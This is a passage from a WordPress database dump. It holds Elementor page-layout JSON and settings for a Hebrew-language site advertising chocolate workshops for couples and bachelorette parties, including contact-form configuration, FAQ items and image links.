fa-sign-in-alt\",\"library\":\"fa-solid\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"da8bdfe\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":29.474},\"elements\":[{\"id\":\"882928d\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d9\\u05e6\\u05d9\\u05e8\\u05ea \\u05e7\\u05e9\\u05e8 \\u05de\\u05d4\\u05d9\\u05e8\\u05d4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d9d026c\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"name\",\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"field_value\":\"\",\"required\":\"true\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"name\",\"recaptcha_badge\":\"bottomright\"},{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\",\"recaptcha_badge\":\"bottomright\"},{\"field_type\":\"tel\",\"field_label\":\"\\u05d8\\u05dc\'\",\"field_value\":\"\",\"placeholder\":\"\\u05d8\\u05dc\'\",\"required\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width\":\"100\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"_id\":\"field_1\",\"custom_id\":\"field_1\",\"recaptcha_badge\":\"bottomright\"}],\"input_size\":\"md\",\"show_labels\":\"\",\"button_text\":\"\\u05e9\\u05dc\\u05d7\\u05d5 \\u05e4\\u05e8\\u05d8\\u05d9\\u05dd\",\"button_icon\":\"fa fa-envelope\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"\\u05d4\\u05d5\\u05d3\\u05e2\\u05d4 \\u05de\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"submit_actions\":[\"email\",\"webhook\"]},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7304a39f\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"7c05bf41\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d6394c4\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e9\\u05d0\\u05dc\\u05d5\\u05ea \\u05e9\\u05ea\\u05de\\u05d9\\u05d3 \\u05e0\\u05e9\\u05d0\\u05dc\\u05d5\\u05ea:\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7554346f\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05db\\u05df, \\u05d0\\u05e4\\u05e9\\u05e8 \\u05d1\\u05d1\\u05d9\\u05ea \\/ \\u05e6\\u05d9\\u05de\\u05e8 \\/ \\u05d4\\u05d0\\u05d5\\u05d5\\u05d9\\u05e8\\u05d4 \\u05d4\\u05e8\\u05d5\\u05de\\u05e0\\u05d8\\u05d9\\u05ea, \\u05e2\\u05dc\\u05d9\\u05db\\u05dd\",\"icon\":\"fa fa-check\",\"_id\":\"00c967d\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"},\"selected_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d9\\u05db\\u05d5\\u05dc\\u05d4 \\u05dc\\u05e7\\u05d7\\u05ea \\u05e9\\u05e2\\u05ea\\u05d9\\u05d9\\u05dd \\u05d5\\u05d9\\u05db\\u05d5\\u05dc\\u05d4 \\u05d9\\u05d5\\u05ea\\u05e8, \\u05ea\\u05dc\\u05d5\\u05d9 \\u05d1\\u05db\\u05dd\",\"icon\":\"fa fa-check\",\"_id\":\"dad4d48\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"},\"selected_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"}},{\"text\":\"\\u05db\\u05de\\u05d5\\u05d1\\u05df \\u05e9\\u05d0\\u05e0\\u05d7\\u05e0\\u05d5 \\u05de\\u05d1\\u05d9\\u05d0\\u05d9\\u05dd \\u05d0\\u05ea \\u05d4\\u05e1\\u05d9\\u05e0\\u05e8 \\u05d5\\u05d0\\u05ea \\u05d4\\u05de\\u05e6\\u05e8\\u05db\\u05d9\\u05dd\",\"icon\":\"fa fa-check\",\"_id\":\"1ecee46\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"},\"selected_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"}},{\"text\":\"\\u05db\\u05df, \\u05e0\\u05e9\\u05d0\\u05d9\\u05e8 \\u05dc\\u05db\\u05dd \\u05db\\u05dc \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e9\\u05d9\\u05d9\\u05e9\\u05d0\\u05e8, \\u05d6\\u05d4 \\u05e8\\u05d5\\u05de\\u05e0\\u05d8\\u05d9 \\u05dc\\u05d7\\u05dc\\u05d5\\u05d8\\u05d9\\u05df, \\u05d1\\u05e8\\u05d5\\u05e8 \\u05dc\\u05e0\\u05d5\",\"icon\":\"fa fa-check\",\"_id\":\"fc43a28\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"},\"selected_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"}},{\"text\":\"\\u05d0\\u05ea\\u05dd \\u05de\\u05d7\\u05dc\\u05d9\\u05d8\\u05d9\\u05dd \\u05d0\\u05dd \\u05d6\\u05d4 \\u05d1\\u05d1\\u05d5\\u05e7\\u05e8 \\u05d0\\u05d5 \\u05d1\\u05e2\\u05e8\\u05d1, \\u05dc\\u05d0 \\u05d0\\u05e0\\u05d7\\u05e0\\u05d5\",\"icon\":\"fa fa-check\",\"_id\":\"3135133\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"},\"selected_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"}}],\"icon_align\":\"right\",\"icon_size\":{\"unit\":\"px\",\"size\":18},\"text_indent\":{\"unit\":\"px\",\"size\":10},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":21},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":1.8}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":false},{\"id\":\"5ff16944\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"3470d199\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/logoup.png\",\"id\":33}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(1855,374,'_elementor_version','2.7.5'),(1856,374,'_elementor_template_type','wp-post'),(1857,374,'_elementor_pro_version','2.7.3'),(1858,374,'_elementor_controls_usage','a:9:{s:11:\"breadcrumbs\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:3;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:27:\"section_breadcrumbs_content\";a:1:{s:5:\"align\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:6:{s:21:\"typography_typography\";i:1;s:22:\"typography_font_family\";i:1;s:20:\"typography_font_size\";i:1;s:22:\"typography_font_weight\";i:1;s:26:\"typography_text_decoration\";i:1;s:10:\"text_color\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:5;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:6:\"layout\";a:1:{s:12:\"_inline_size\";i:4;}}}}s:7:\"section\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:6:\"layout\";a:2:{s:14:\"section_layout\";a:1:{s:15:\"stretch_section\";i:1;}s:17:\"section_structure\";a:1:{s:9:\"structure\";i:2;}}s:5:\"style\";a:1:{s:18:\"section_background\";a:2:{s:21:\"background_background\";i:2;s:16:\"background_color\";i:2;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:13:\"section_title\";a:4:{s:5:\"title\";i:3;s:4:\"size\";i:1;s:11:\"header_size\";i:1;s:5:\"align\";i:1;}}}}s:11:\"text-editor\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:3:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:3;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:2:{s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}s:8:\"advanced\";a:1:{s:14:\"_section_style\";a:1:{s:8:\"_padding\";i:1;}}}}s:5:\"image\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:13:\"section_image\";a:2:{s:5:\"image\";i:2;s:10:\"image_size\";i:1;}}}}s:6:\"button\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:3;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_button\";a:6:{s:4:\"text\";i:1;s:4:\"link\";i:1;s:5:\"align\";i:1;s:4:\"size\";i:1;s:11:\"icon_indent\";i:1;s:13:\"selected_icon\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:2:{s:16:\"background_color\";i:1;s:33:\"button_box_shadow_box_shadow_type\";i:1;}}}}s:4:\"form\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:3;s:8:\"controls\";a:1:{s:7:\"content\";a:6:{s:19:\"section_form_fields\";a:4:{s:9:\"form_name\";i:1;s:11:\"form_fields\";i:1;s:10:\"input_size\";i:1;s:11:\"show_labels\";i:1;}s:21:\"section_submit_button\";a:1:{s:11:\"button_text\";i:1;}s:13:\"section_email\";a:2:{s:13:\"email_subject\";i:1;s:10:\"email_from\";i:1;}s:15:\"section_email_2\";a:3:{s:15:\"email_subject_2\";i:1;s:12:\"email_from_2\";i:1;s:17:\"email_from_name_2\";i:1;}s:20:\"section_form_options\";a:4:{s:15:\"success_message\";i:1;s:13:\"error_message\";i:1;s:22:\"required_field_message\";i:1;s:15:\"invalid_message\";i:1;}s:19:\"section_integration\";a:1:{s:14:\"submit_actions\";i:1;}}}}s:9:\"icon-list\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:3;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:12:\"section_icon\";a:1:{s:9:\"icon_list\";i:1;}}s:5:\"style\";a:3:{s:17:\"section_icon_list\";a:1:{s:10:\"icon_align\";i:1;}s:18:\"section_icon_style\";a:1:{s:9:\"icon_size\";i:1;}s:18:\"section_text_style\";a:4:{s:11:\"text_indent\";i:1;s:26:\"icon_typography_typography\";i:1;s:25:\"icon_typography_font_size\";i:1;s:27:\"icon_typography_line_height\";i:1;}}}}}'),(1860,69,'_yoast_wpseo_title','סדנת שוקולד זוגית - חווייה רומנטית שלעולם לא תישכח | Chocolate4U'),(1861,375,'_wp_page_template','elementor_header_footer'),(1862,375,'_elementor_edit_mode','builder'),(1863,375,'_elementor_template_type','wp-post'),(1864,375,'_elementor_data','[{\"id\":\"e598d46\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"background_background\":\"classic\",\"background_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"5064e7e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a3f5421\",\"elType\":\"widget\",\"settings\":{\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Open Sans Hebrew\",\"typography_font_size\":{\"unit\":\"px\",\"size\":17},\"typography_font_weight\":\"normal\",\"typography_text_decoration\":\"underline\",\"text_color\":\"#54595f\"},\"elements\":[],\"widgetType\":\"breadcrumbs\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3c6b6e2f\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"4bb4f72e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":70},\"elements\":[{\"id\":\"6ddff824\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d465aa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>\\u05e8\\u05d5\\u05e6\\u05d5\\u05ea \\u05dc\\u05d2\\u05e8\\u05d5\\u05dd \\u05dc\\u05db\\u05dc\\u05d4 \\\"TO BE\\\" \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05ea \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3? \\u05dc\\u05e4\\u05e0\\u05d9 \\u05e9\\u05d0\\u05ea\\u05df \\u05e8\\u05e6\\u05d5\\u05ea \\u05dc\\u05e9\\u05d9\\u05dd \\u05d0\\u05ea \\u05d4\\u05e7\\u05e9\\u05ea\\u05d5\\u05ea \\u05d5\\u05d0\\u05ea \\u05d4\\u05e7\\u05e9\\u05d9\\u05d5\\u05ea \\u05d4\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d5\\u05ea \\u05e9\\u05dc\\u05db\\u05df, \\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d7\\u05d5\\u05d5\\u05ea \\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05d4\\u05d0\\u05e4\\u05e8\\u05d5\\u05d3\\u05d9\\u05d6\\u05d9\\u05d0\\u05e7 \\u05d4\\u05d0\\u05de\\u05d9\\u05ea\\u05d9 \\u05dc\\u05db\\u05dc \\u05d0\\u05d3\\u05dd.\\u00a0<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"df02b1d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/bach-choco.jpg\",\"id\":97},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4b78ab22\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a0<\\/p><p>\\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d6\\u05e8\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d9\\u05dd \\u05de\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05d8\\u05e8\\u05d0\\u05e4\\u05dc\\u05e1 \\u05d5\\u05e2\\u05d5\\u05d3 \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d9\\u05dd \\u05e9\\u05db\\u05dc \\u05d0\\u05d9\\u05e9\\u05d4 \\u05d5\\u05d7\\u05d1\\u05e8\\u05d4 \\u05ea\\u05d9\\u05d4\\u05e0\\u05d4 \\u05de\\u05d4\\u05dd \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05de\\u05ea \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3. \\u05d4\\u05e4\\u05ea\\u05e2\\u05d5\\u05ea \\u05d5\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d9\\u05dd \\u05e9\\u05d9\\u05db\\u05d5\\u05dc\\u05d9\\u05dd \\u05dc\\u05e2\\u05d6\\u05d5\\u05e8 \\u05dc\\u05db\\u05dd \\u05dc\\u05e2\\u05d1\\u05d5\\u05e8 \\u05d0\\u05ea \\u05d4\\u05e2\\u05e8\\u05d1 \\u05e9\\u05dc \\u05d4\\u05d0\\u05dc\\u05db\\u05d5\\u05d4\\u05d5\\u05dc \\u05d5\\u05de\\u05d5\\u05d6\\u05d9\\u05e7\\u05d4 \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05d4\\u05db\\u05d9\\u05e4\\u05d9\\u05ea \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3 \\u05dc\\u05db\\u05dc \\u05d0\\u05d9\\u05e9\\u05d4 \\u05d5\\u05d7\\u05d1\\u05e8\\u05d4. \\u05ea\\u05e2\\u05e9\\u05d5 \\u05d7\\u05d9\\u05d9\\u05dd, \\u05d5\\u05db\\u05de\\u05d5\\u05d1\\u05df, \\u05d4\\u05e8\\u05d1\\u05d4 \\u05de\\u05d0\\u05d5\\u05d3 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3. \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea \\u05ea\\u05e2\\u05d6\\u05d5\\u05e8 \\u05dc\\u05db\\u05df \\u05dc\\u05d4\\u05e4\\u05d5\\u05da \\u05d0\\u05ea \\u05d4\\u05e2\\u05e8\\u05d1 \\u05dc\\u05de\\u05ea\\u05d5\\u05e7 \\u05d9\\u05d5\\u05ea\\u05e8 \\u05de\\u05d4\\u05e8\\u05d2\\u05e2 \\u05d4\\u05e8\\u05d0\\u05e9\\u05d5\\u05df.\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"56d7aa1\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>\\u05de\\u05d4 \\u05e2\\u05d5\\u05d3 \\u05d0\\u05e0\\u05d7\\u05e0\\u05d5 \\u05e2\\u05d5\\u05e9\\u05d9\\u05dd?<\\/h3><ul><li><span style=\\\"text-decoration: underline;\\\"><a href=\\\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%96%D7%95%D7%92%D7%99%D7%AA\\/\\\">\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea<\\/a><\\/span><u><\\/u><\\/li><li><u><a href=\\\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%97%D7%91%D7%A8%D7%95%D7%AA\\/\\\">\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d5\\u05d0\\u05e8\\u05d2\\u05d5\\u05e0\\u05d9\\u05dd<\\/a><\\/u><\\/li><li><u><a href=\\\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%99%D7%9C%D7%93%D7%99%D7%9D\\/\\\">\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd<\\/a><\\/u><\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7eb3f731\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":30},\"elements\":[{\"id\":\"aade027\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d9\\u05e6\\u05d9\\u05e8\\u05ea \\u05e7\\u05e9\\u05e8 \\u05de\\u05d4\\u05d9\\u05e8\\u05d4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"724228ca\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"name\",\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"field_value\":\"\",\"required\":\"true\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"name\",\"recaptcha_badge\":\"bottomright\"},{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\",\"recaptcha_badge\":\"bottomright\"},{\"field_type\":\"tel\",\"field_label\":\"\\u05d8\\u05dc\'\",\"field_value\":\"\",\"placeholder\":\"\\u05d8\\u05dc\'\",\"required\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width\":\"100\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"_id\":\"field_1\",\"custom_id\":\"field_1\",\"recaptcha_badge\":\"bottomright\"}],\"input_size\":\"md\",\"show_labels\":\"\",\"button_text\":\"\\u05e9\\u05dc\\u05d7\\u05d5 \\u05e4\\u05e8\\u05d8\\u05d9\\u05dd\",\"button_icon\":\"fa fa-envelope\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"submit_actions\":[\"email\",\"webhook\"],\"webhooks\":\"https:\\/\\/api.leadmanager.co.il\\/handlers\\/lm\\/submit.cms?lm_form=34826&lm_key=8e0cfb811d714b40a0691df809a7a4d5\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5acecf8\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"3ce72ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"55c9916\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e9\\u05d0\\u05dc\\u05d5\\u05ea \\u05e9\\u05ea\\u05de\\u05d9\\u05d3 \\u05e0\\u05e9\\u05d0\\u05dc\\u05d5\\u05ea:\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1e9a451\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05db\\u05df, \\u05d0\\u05e4\\u05e9\\u05e8 \\u05d1\\u05d1\\u05d9\\u05ea \\/ \\u05e6\\u05d9\\u05de\\u05e8 \\/ \\u05d5\\u05d9\\u05dc\\u05d4 (\\u05db\\u05dc \\u05de\\u05e7\\u05d5\\u05dd \\u05e9\\u05ea\\u05d1\\u05d7\\u05e8\\u05d5)\",\"icon\":\"fa fa-check\",\"_id\":\"00c967d\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"},\"selected_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05d9\\u05d0 \\u05db-2-4 \\u05e9\\u05e2\\u05d5\\u05ea\",\"icon\":\"fa fa-check\",\"_id\":\"dad4d48\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"},\"selected_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"}},{\"text\":\"\\u05dc\\u05d0, \\u05d0\\u05d9\\u05df \\u05e6\\u05d5\\u05e8\\u05da \\u05dc\\u05d4\\u05d1\\u05d9\\u05d0 \\u05e1\\u05d9\\u05e0\\u05e8, \\u05d0\\u05e0\\u05d7\\u05e0\\u05d5 \\u05de\\u05d1\\u05d9\\u05d0\\u05d9\\u05dd \\u05dc\\u05db\\u05df ;)\",\"icon\":\"fa 